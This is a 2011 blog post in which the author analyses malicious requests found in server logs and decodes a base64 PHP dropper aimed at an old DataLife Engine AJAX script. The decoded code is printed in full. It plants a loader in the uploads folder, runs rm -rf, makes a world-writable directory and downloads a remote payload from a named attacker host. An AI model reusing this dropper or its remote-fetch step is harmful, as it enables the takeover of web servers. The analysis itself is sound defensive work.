HTML, CSS, JS and other unsorted stuff

Daily !fun with server logs

Friday, September 9, 2011 5:10:05 AM

,

Yesterday one of our servers was hit by a big enough bunch of unusual requests that our IDS issued a warning, so I looked into the server logs and saw a whole bunch of the following (wrapped for better readability):

GET /engine/ajax/updates.php?wert=1&user_id=
QGluaV9zZXQoJ2FsbG93X3VybF9mb3BlbicsIDEpOwoKJHVwbG9hZERpciA9ICcuLi8uLi91cGxvYWRzJzsKJGxvYWRlck5hbWUgPSAnbG9hZGVyei5mYzFjMGNhYTNlOWYwMGZmMTk4OWJl ZjM2NTViMjE3NS5waHAnOwoKaWYgKGlzX2RpcigkdXBsb2FkRGlyKSkKewoJJGZwID0gZm9wZW4oIiR1cGxvYWREaXIvJGxvYWRlck5hbWUiLCAndycpOwoJZndyaXRlKCRmcCwgYmFzZTY0 X2RlY29kZSgnUEQ5d2FIQUtDa0JwYm1sZmMyVjBLQ2RoYkd4dmQxOTFjbXhmWm05d1pXNG5MQ0F4S1RzS0NpUnZiR1JFYVhJZ1BTQW5hM051ZFhKb0p6c0tKRzVsZDBScGNpQTlJQ2RyYzI1 MWNtZ25Pd29rYkc5aFpHVnlUbUZ0WlNBOUlDZHNiMkZrWlhKNkxtWmpNV013WTJGaE0yVTVaakF3Wm1ZeE9UZzVZbVZtTXpZMU5XSXlNVGMxTG5Cb2NDYzdDZ3BBWlhobFl5Z2ljbTBnTFhK bUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSE41YzNSbGJTZ2ljbTBnTFhKbUlDUnZiR1JFYVhJZ0pHNWxkMFJwY2lBcWJHOWhaR1Z5ZWlvaUtUc0tRSEp0Wkds eUtDUnZiR1JFYVhJcE93cEFjbTFrYVhJb0pHNWxkMFJwY2lrN0NrQjFibXhwYm1zb0pHeHZZV1JsY2s1aGJXVXBPd29LYVdZZ0tDRkFhWE5mWkdseUtDUnVaWGRFYVhJcEtRcDdDZ2trYjJ4 a1gzVnRZWE5ySUQwZ1FIVnRZWE5yS0RBcE93b0pRRzFyWkdseUtDUnVaWGRFYVhJc0lEQTNOemNwT3dvSlFIVnRZWE5yS0NSdmJHUmZkVzFoYzJzcE93a0tDVUJsZUdWaktDSmphRzF2WkNB M056Y2dKRzVsZDBScGNpSXBPd3A5Q2dwcFppQW9RR2x6WDJScGNpZ2tibVYzUkdseUtTa0tld29KSkdad0lEMGdabTl3Wlc0b0lpUnVaWGRFYVhJdmFXNWtaWGd1Y0dod0lpd2dKM2NuS1Rz S0NXWjNjbWwwWlNna1puQXNJRUJpWVhObE5qUmZaR1ZqYjJSbEtHWnBiR1ZmWjJWMFgyTnZiblJsYm5SektDZG9kSFJ3T2k4dlpHOW5hWE5sY25abGNpNWpiMjB2WTI5dWRISnZiQzlzYjJG a1pYSXVjR2h3UDNCaGMzTjNiM0prUFVwSVIwSldhbXRvYzJrNGVXaDFOalYwTTNWNVp5WmhZM1JwYjI0OWFXNWtaWGduS1NrcE93b0pabU5zYjNObEtDUm1jQ2s3Q2drSkNnbHBaaUFvUUda cGJHVmZaWGhwYzNSektDSWtibVYzUkdseUwybHVaR1Y0TG5Cb2NDSXBLUW9KZXdvSkNYQnlhVzUwSUNjNU1UYzBOamczTmpJMU5qUTROQ2M3Q2dsOUNna0tDVUIxYm14cGJtc29KR3h2WVdS bGNrNWhiV1VwT3dwOUNnby9QZz09JykpOwoJZmNsb3NlKCRmcCk7CgoJcHJpbnQgJzkxNzQ2ODc2MjU2NDg0JzsKfQ==  HTTP/1.1

The user_id doesn't look like a normal user ID at all, it looks like a baseXX encoded file, so let's try it with base64 first:

GET /engine/ajax/updates.php?wert=1&user_id=@ini_set('allow_url_fopen', 1);

$uploadDir = '../../uploads';
$loaderName = 'loaderz.fc1c0caa3e9f00ff1989bef3655b2175.php';

if (is_dir($uploadDir))
{
	$fp = fopen("$uploadDir/$loaderName", 'w');
	fwrite($fp, base64_decode('
PD9waHAKCkBpbmlfc2V0KCdhbGxvd191cmxfZm9wZW4nLCAxKTsKCiRvbGREaXIgPSAna3NudXJoJzsKJG5ld0RpciA9ICdrc251cmgnOwokbG9hZGVyTmFtZSA9ICdsb2FkZXJ6LmZjMWMwY2FhM2U5ZjAwZmYxOTg5YmVmMzY1NWIyMTc1LnBocCc7CgpAZXhlYygicm0gLXJmICRvbGREaXIgJG5ld0RpciAqbG9hZGVyeioiKTsKQHN5c3RlbSgicm0gLXJmICRvbGREaXIgJG5ld0RpciAqbG9hZGVyeioiKTsKQHJtZGlyKCRvbGREaXIpOwpAcm1kaXIoJG5ld0Rpcik7CkB1bmxpbmsoJGxvYWRlck5hbWUpOwoKaWYgKCFAaXNfZGlyKCRuZXdEaXIpKQp7Cgkkb2xkX3VtYXNrID0gQHVtYXNrKDApOwoJQG1rZGlyKCRuZXdEaXIsIDA3NzcpOwoJQHVtYXNrKCRvbGRfdW1hc2spOwkKCUBleGVjKCJjaG1vZCA3NzcgJG5ld0RpciIpOwp9CgppZiAoQGlzX2RpcigkbmV3RGlyKSkKewoJJGZwID0gZm9wZW4oIiRuZXdEaXIvaW5kZXgucGhwIiwgJ3cnKTsKCWZ3cml0ZSgkZnAsIEBiYXNlNjRfZGVjb2RlKGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vZG9naXNlcnZlci5jb20vY29udHJvbC9sb2FkZXIucGhwP3Bhc3N3b3JkPUpIR0JWamtoc2k4eWh1NjV0M3V5ZyZhY3Rpb249aW5kZXgnKSkpOwoJZmNsb3NlKCRmcCk7CgkJCglpZiAoQGZpbGVfZXhpc3RzKCIkbmV3RGlyL2luZGV4LnBocCIpKQoJewoJCXByaW50ICc5MTc0Njg3NjI1NjQ4NCc7Cgl9CgkKCUB1bmxpbmsoJGxvYWRlck5hbWUpOwp9Cgo/Pg==

'));
	fclose($fp);

	print '91746876256484';
} HTTP/1.1

Woops, a direct hit, that was easy.

Someone wants to upload something, and if I am not wrong, the ../../ should lead directly to the base or user folder - so let's decode again to see what it wants to upload.

Warning! Don't follow the URL in the following section unless you know exactly what you do!
At the time I tested it, the site was definitely riddled with malware in some sections (minimum 2 Trojans), so make sure you have a good anti-virus protection, a system backup and don't use a production system.
GET /engine/ajax/updates.php?wert=1&user_id=@ini_set('allow_url_fopen', 1);

$uploadDir = '../../uploads';
$loaderName = 'loaderz.fc1c0caa3e9f00ff1989bef3655b2175.php';

if (is_dir($uploadDir))
{
	$fp = fopen("$uploadDir/$loaderName", 'w');
	fwrite($fp, <?php

@ini_set('allow_url_fopen', 1);

$oldDir = 'ksnurh';
$newDir = 'ksnurh';
$loaderName = 'loaderz.fc1c0caa3e9f00ff1989bef3655b2175.php';

@exec("rm -rf $oldDir $newDir *loaderz*");
@system("rm -rf $oldDir $newDir *loaderz*");
@rmdir($oldDir);
@rmdir($newDir);
@unlink($loaderName);

if (!@is_dir($newDir))
{
	$old_umask = @umask(0);
	@mkdir($newDir, 0777);
	@umask($old_umask);	
	@exec("chmod 777 $newDir");
}

if (@is_dir($newDir))
{
	$fp = fopen("$newDir/index.php", 'w');
	fwrite($fp, file_get_contents('http://dogiserver.com/control/loader.php?password=JHGBVjkhsi8yhu65t3uyg&amp;action=index'));
	fclose($fp);
		
	if (@file_exists("$newDir/index.php"))
	{
		print '91746876256484';
	}
	
	@unlink($loaderName);
}

?>);
	fclose($fp);

	print '91746876256484';
} HTTP/1.1

I stopped here because our system spits out the usual error for this kind of requests. For pure personal interest I set a flag on such requests to see if they evolve.

My opinion about the server side requirements for this attack to work:

I really don't know who hit the stupid idea to use a vulnerable PHP AJAX script for am CMS or plug-in that base64 decodes the user_id token, and then evals it. This none-code-sanitizing opens a wide door for any kinds of attacks like for example SQL injections too, and I can imagine no good reason to do it ever.
More:
Why is the uploads dir in the publicly available part of the server so that any requests to those files will execute the PHP? That is an absolute no-go and I wonder if this kind of attack ever worked on any system that was not set up by a person without any real knowledge.

Any hints which application or CMS or AJAX script is the attacked one or causes it?
I'd like to inform the author about this issue.

Adding the Google +1 button to a webpage without violating the users privacyJetzt weiß ich endlich wozu ein MacBook Air gut ist

Comments

Unregistered user Friday, September 30, 2011 12:14:31 PM

Anonymous writes: It seems to be some russian CMS, if you googledork it. I had this issue on my site but they were trying to access /engine/ajax/keywords.php instead. Why I think it's a russian CMS is because I can only find russian sites with this file. Try it yourself: inurl:"engine/ajax/keywords.php" OR inurl:"/engine/ajax/updates.php" filetype:php

Unregistered user Friday, September 30, 2011 12:16:30 PM

Anonymous writes: In fact, I believe it's this: http://dle-news.ru/

QuHno Sunday, October 2, 2011 10:37:05 PM

Yes, but an old version, so there should be no need to worry about (at least I hope so)

How to use Quote function:

  1. Select some text
  2. Click on the Quote link

Write a comment

Comment
(BBcode and HTML is turned off for anonymous user comments.)

If you can't read the words, press the small reload icon.


Smilies

Paranoia

  • AV-Comparatives.org

    Regelmäßige Tests von Antiviren-Software. Proaktive, on-demand und Performance Tests (en)

  • Matousec.com

    Proactive Security Challenge für Firewalls. Hält die Firewall, was der Hersteller verspricht? (en)

  • Secunia.com

    Sind alle installierten Programme auf dem neuesten Stand? Haben sie Sicherheitslücken? Hier bekommt man die Antwort (en)

  • BSI Bürger Cert

    Aktuelle Warnmeldungen zu Sicherheitslücken und Bedrohungen für den Normalmenschen verständlich aufbereitet (de)

  • Opera rootstore

    The latest changes in Operas accepted Certificate Authoritiy (encrytion) files

  • Sucuri

    Täglich aktualisierte Meldungen über Sicherheitslücken und verbreitete Malware (en)

blog

CSS